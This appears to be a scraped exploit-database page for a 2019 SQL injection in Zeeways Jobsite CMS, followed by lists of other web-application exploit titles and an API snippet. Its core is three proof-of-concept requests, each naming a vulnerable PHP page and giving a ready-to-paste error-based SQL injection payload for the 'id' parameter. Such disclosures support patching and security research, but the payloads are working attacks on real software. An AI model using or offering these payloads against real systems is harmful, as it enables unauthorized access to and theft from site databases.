Search for hundreds of thousands of exploits

"Zeeways Jobsite CMS - 'id' SQL Injection"

Author

Exploit author

"Ahmet Ümit BAYRAM"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-12-09"PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass"webappsphp"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Rent a Car 3 - 'klima' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Emlak 2 - 'ara' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi E-Ticaret 3 - 'a' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-07-19"Web Ofisi Firma 13 - 'oz' SQL Injection"webappslinux"Ahmet Ümit BAYRAM"
2019-04-08"Jobgator - 'experience' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-03"Ashop Shopping Cart Software - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-03"iScripts ReserveLogic - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-02"Inout EasyRooms - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-04-02"Inout RealEstate - 'city' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-28"Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-28"Airbnb Clone Script - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-27"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"XooGallery - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"XooDigital - 'p' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-26"SJS Simple Job Script - SQL Injection / Cross-Site Scripting"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Zeeways Jobsite CMS - 'id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-25"Zeeways Matrimony CMS - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Matri4Web Matrimony Website Script - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Inout Article Base CMS - SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-22"Meeplace Business Review Script - 'id' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-21"Netartmedia Vlog System - 'email' SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
2019-03-21"Bootstrapy CMS - Multiple SQL Injection"webappsphp"Ahmet Ümit BAYRAM"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46602/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.